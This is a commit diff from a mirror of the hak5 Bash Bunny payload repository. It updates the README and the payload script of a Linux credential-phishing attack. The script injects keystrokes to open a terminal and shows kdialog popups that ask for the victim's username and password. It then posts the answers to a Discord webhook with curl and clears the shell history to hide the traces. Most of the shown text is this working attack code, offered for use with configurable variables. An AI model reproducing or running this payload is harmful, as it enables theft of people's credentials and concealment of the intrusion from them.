hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

variables

pull/623/head
Aleff 2024-06-10 13:48:17 +02:00
parent d11423ae10
commit 9d3d60d08b
2 changed files with 58 additions and 45 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/README.md
View File

@ -1,5 +1,5 @@
# Standard Phishing Payload Using kdialog - Linux # Standard Phishing Payload Using kdialog - Linux
A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog. A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog.
@ -20,13 +20,29 @@ Opens a shell, get the data by a popup, send the input to a Discord webhook (or
### Settings ### Settings
* Set the Discord webhook * Set the Discord webhook
```shell
DISCORD_WEBHOOK='https://discordapp.com/api/webhooks/<webhook_id>/<token>'
```
* Set the payload as you want * Set the payload as you want
```shell
POPUP_TITLE0='Config Popup'
POPUP-MESSAGE0='Insert your username and password for go on'
POPUP-TITLE1='Insert your Username'
POPUP-MESSAGE1='Username'
POPUP-TITLE2='Insert your Password'
POPUP-MESSAGE2='Password'
```
### cURL Command ### cURL Command
With this payload you can send a post message using cURL shell command line to the webhook or whatever you choose for the exfiltration. You should replace the tag *\<message>* with the user input. With this payload you can send a post message using cURL shell command line to the webhook or whatever you choose for the exfiltration. You should replace the tag *\<message>* with the user input.
- `curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(<message>)\"}" $WEBHOOK_URL);` ```shell
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(<message>)\"}" $WEBHOOK_URL);
```
### kdialog - Popup command ### kdialog - Popup command
@ -60,7 +76,7 @@ This payload is intended to be a working tool for performing cybersecurity analy
## Credits ## Credits
<h2 align="center"> Aleff :octocat: </h2> <h2 align="center">Aleff</h2>
<div align=center> <div align=center>
<table> <table>
<tr> <tr>
@ -70,17 +86,11 @@ This payload is intended to be a working tool for performing cybersecurity analy
</a> </a>
<br>Github <br>Github
</td> </td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96"> <td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/"> <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" /> <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a> </a>
<br>Discord <br>LinkedIn
</td> </td>
</tr> </tr>
</table> </table>

73
payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/payload.txt
View File

@ -1,46 +1,49 @@
* ########################################################## ##########################################################
* # | # #
* # Title : Standard Phishing Payload Using kdialog | # Title : Standard Phishing Payload Using kdialog #
* # Author : Aleff | # Author : Aleff #
* # Version : 1.0 | # Version : 1.0 #
* # Category : Phishing | # Category : Phishing #
* # Target : Linux | # Target : GNU/Linux #
* # | # #
* ########################################################## ##########################################################
* Requirements: ATTACKMODE HID
* - EXFILTRATION:
* - Internet Connection
* - Discord webhook for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Dropbox, Telegram and so on..)
* - PHISHING:
* - This payload is usable on the Linux system where is installed 'kdialog', but you can use whatever you want for simulate the popup with the intent to take the input
* - It is important that the popup payload occurs in a single line so that the traces of data collection are eliminated immediately after submission. This is precisely why you can see the * ed code to get a good understanding of what it is all about.
# REQUIREMENTS
# - EXFILTRATION:
# - Internet Connection
# - Discord webhook for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Dropbox, Telegram and so on..)
# - PHISHING:
# - This payload is usable on the GNU/Linux system where is installed 'kdialog', but you can use whatever you want for simulate the popup with the intent to take the input
# - It is important that the popup payload occurs in a single line so that the traces of data collection are eliminated immediately after submission. This is precisely why you can see the * ed code to get a good understanding of what it is all about.
QUACK DELAY 1000 # VARIABLES
# 1) Provide Discord Webhook
DISCORD_WEBHOOK='https://discordapp.com/api/webhooks/<webhook_id>/<token>'
# You can set the title, the message, the input type and so and so on...
POPUP_TITLE0='Config Popup'
POPUP-MESSAGE0='Insert your username and password for go on'
POPUP-TITLE1='Insert your Username'
POPUP-MESSAGE1='Username'
POPUP-TITLE2='Insert your Password'
POPUP-MESSAGE2='Password'
QUACK DELAY 1500
QUACK CTRL-ALT t QUACK CTRL-ALT t
QUACK DELAY 2000 QUACK DELAY 2000
* REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token> # A short and efficient cURL command to send an HTTP POST request to a webhook URL with JSON data in the request body.
QUACK STRING WEBHOOK_URL="WEBHOOK" QUACK STRING $(curl -H 'Content-Type: application/json' -X POST -d '{\"content\": \"$(
QUACK ENTER
QUACK DELAY 500
# A compact command that uses kdialog to display a popup message prompting (into the curl content section) the user to enter their username and password to proceed. You can't acquire multiple input in one popup, so you should use multiple popup, as i wrote here.
QUACK STRING kdialog --title $POPUP_TITLE0 --msgbox $POPUP-MESSAGE0;
QUACK STRING kdialog --title $POPUP-TITLE1 --inputbox $POPUP-MESSAGE1;
QUACK STRING kdialog --title $POPUP-TITLE2 --password $POPUP-MESSAGE2 --default 'password';
* A short and efficient cURL command to send an HTTP POST request to a webhook URL with JSON data in the request body. # The end part of the curl payload...
QUACK STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$( QUACK STRING )\"}' $DISCORD_WEBHOOK);
* A compact command that uses kdialog to display a popup message prompting (into the curl content section) the user to enter their username and password to proceed. You can't acquire multiple input in one popup, so you should use multiple popup, as i wrote here. # history -c will clear the last shell history and the exit command will close the popup at the end of the execution
* You can set the title, the message, the input type and so and so on...
QUACK STRING kdialog --title "Popup Title" --msgbox "Insert your username and password for go on";
QUACK STRING kdialog --title "Insert your Username" --inputbox "Username";
QUACK STRING kdialog --title "Insert your Password" --password "Password" --default "password";
* The end part of the curl payload...
QUACK STRING )\"}" $WEBHOOK_URL);
* history -c will clear the last shell history and the exit command will close the popup at the end of the execution
QUACK STRING history -c; exit; QUACK STRING history -c; exit;
* All-In-One doesn't need delay time
QUACK ENTER QUACK ENTER